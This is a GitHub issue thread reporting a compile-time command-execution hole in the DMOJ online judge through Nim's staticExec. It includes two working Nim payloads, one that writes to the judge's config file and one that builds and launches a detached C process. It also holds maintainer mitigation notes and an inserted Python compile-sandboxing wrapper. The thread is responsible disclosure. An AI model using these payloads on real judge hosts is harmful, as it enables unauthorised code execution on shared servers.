
Compilation time command execution vulnerability #318

Closed
apardyl opened this issue Mar 30, 2018 · 2 comments

apardyl commented Mar 30, 2018

As compilation is not sandboxed, the user is able to execute arbitrary commands on the judge host.
Example in Nim:

import macros
static:
  error(staticExec("echo oops >> /home/dmoj/dmoj.yml"))

The command runs with judge privileges and has full access to the machine. More interesting example:

import macros
static:
  error(staticExec("echo '#include <unistd.h>\n#include <signal.h>\nint main(){if(fork()==0){signal(SIGHUP, SIG_IGN);close(0);close(1);close(2);setsid();while(1){}}return 0;}' > test.c; gcc test.c -o test; ./test;"))

After submitting this to my DMOJ instance (via the web interface) the test executable was still running after the judge had returned with a compile error and had to be killed manually. One could simply replace while(1){} with a socket connection/ssh session to a remote machine or any other malicious code.

This issue was first found by @zielmicha

Xyene commented Mar 30, 2018

Thanks for reporting this. We've disabled Nim on dmoj.ca.

The DMOJ judge should not (and refuses to) be run as root, and the judge user should be set up by the sysadmin to be fairly locked down in its ability to do anything nefarious (this may include process/disk limits, a firewall allowing access to only the bridge address/port, etc.) so that potential damage in case of unsecured code execution is minimized.

That said, Nim allowing arbitrary code execution as part of its regular features is problematic, but we also can't reliably sandbox compilers the same way we do runtimes. It would theoretically be possible to develop some sort of "compilation host" service running inside e.g. Docker instances, but this would be a large engineering effort to be viable right now.

For now, it would probably be best to entirely remove Nim support (unless staticExec and friends can be disabled), and re-examine other less-used executors, in case they have analogous features. The risk of e.g. a buffer overflow in GCC being used to run arbitrary code is small and should be in large part mitigated by locking down the judge user, but users should definitely not be allowed to run arbitrary code out-of-the-box.
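The mitigations listed in the comment above (a locked-down judge user, process and disk limits, and a compile step that does not leave processes behind) as an added Python example; this is not code from the DMOJ judge. It is a compile wrapper that runs a compiler command in its own session with resource limits, a minimal environment and a wall-clock timeout, then scans for and kills anything still alive in that process group. The function names, the limit values and the /proc-based scan are assumptions of this example, not DMOJ's implementation.

```python
import os
import resource
import signal
import subprocess
import tempfile


def _set_limits(max_procs):
    """Child-side resource limits; runs in the forked child before exec()."""
    def clamp(which, want):
        # Never raise a limit above the hard limit or setrlimit() fails.
        soft, hard = resource.getrlimit(which)
        if hard != resource.RLIM_INFINITY:
            want = min(want, hard)
        resource.setrlimit(which, (want, hard))

    clamp(resource.RLIMIT_CPU, 10)                   # seconds of CPU time
    clamp(resource.RLIMIT_FSIZE, 64 * 1024 * 1024)   # largest file it may write
    clamp(resource.RLIMIT_AS, 1024 * 1024 * 1024)    # address space
    clamp(resource.RLIMIT_CORE, 0)                   # no core dumps
    if max_procs is not None:
        # Per-uid limit (assumed value chosen by the caller): caps fork storms,
        # but a single lingering daemon still fits under it.
        clamp(resource.RLIMIT_NPROC, max_procs)


def _procs_in_group(pgid):
    """Linux-only: pids whose process group is pgid, read from /proc/<pid>/stat."""
    found = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/stat") as f:
                stat = f.read()
        except OSError:
            continue            # process vanished between listdir() and open()
        # The comm field may contain spaces, so split after the closing ')':
        # the remaining fields are state, ppid, pgrp, session, ...
        fields = stat.rsplit(")", 1)[1].split()
        if int(fields[2]) == pgid:
            found.append(int(entry))
    return found


def run_compile(argv, workdir=None, wall_seconds=30, max_procs=None):
    """Run a compiler command under limits and report anything it left behind.

    Returns a dict with returncode, timed_out, the captured output and the
    list of stray pids found (and killed) in the compiler's process group.
    """
    if workdir is None:
        with tempfile.TemporaryDirectory() as tmp:
            return run_compile(argv, tmp, wall_seconds, max_procs)

    env = {"PATH": "/usr/bin:/bin", "HOME": workdir, "LANG": "C"}
    # Output goes to a file, not a pipe: a background child that inherits a
    # pipe would otherwise keep communicate()/wait() blocked until it exits.
    with tempfile.TemporaryFile(mode="w+") as log:
        proc = subprocess.Popen(
            argv, cwd=workdir, env=env,
            stdin=subprocess.DEVNULL, stdout=log, stderr=subprocess.STDOUT,
            start_new_session=True,          # child becomes its own session/group leader
            preexec_fn=lambda: _set_limits(max_procs),
        )
        pgid = proc.pid
        try:
            returncode = proc.wait(timeout=wall_seconds)
            timed_out = False
        except subprocess.TimeoutExpired:
            timed_out = True
            os.killpg(pgid, signal.SIGKILL)
            returncode = proc.wait()
        # Anything still in the group after the compiler exited is a stray.
        # Caveat: a child that called setsid() (as the payload in the report
        # does) has left this group and is NOT caught here; only a PID
        # namespace or cgroup can reap that reliably.
        strays = [p for p in _procs_in_group(pgid) if p != proc.pid]
        if strays:
            try:
                os.killpg(pgid, signal.SIGKILL)
            except ProcessLookupError:
                pass
        log.seek(0)
        output = log.read()
    return {"returncode": returncode, "timed_out": timed_out,
            "output": output, "strays": strays}
```

Called as `run_compile(["gcc", "test.c", "-o", "test"], workdir)` the wrapper bounds CPU, memory and file size for the compiler and any child it spawns, and the stray scan catches a forked child that stayed in the group. It is a reduction of the damage, not a sandbox: the reported payload calls setsid(), which moves the daemon out of the process group, so the guarantee the comment is after (nothing survives the compile step) needs the compiler to run under a PID namespace or cgroup, which is the "compilation host" direction described above.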

Xyene added a commit that referenced this issue Mar 30, 2018
quantum5 commented

Also, we have added security@dmoj.ca for security reports and added https://dmoj.ca/.well-known/security.txt. If there are additional runtimes affected, please send them to that address first.

If you or @zielmicha wish to be credited, we will add it to https://dmoj.ca/security/.

@Xyene Xyene closed this as completed Oct 18, 2018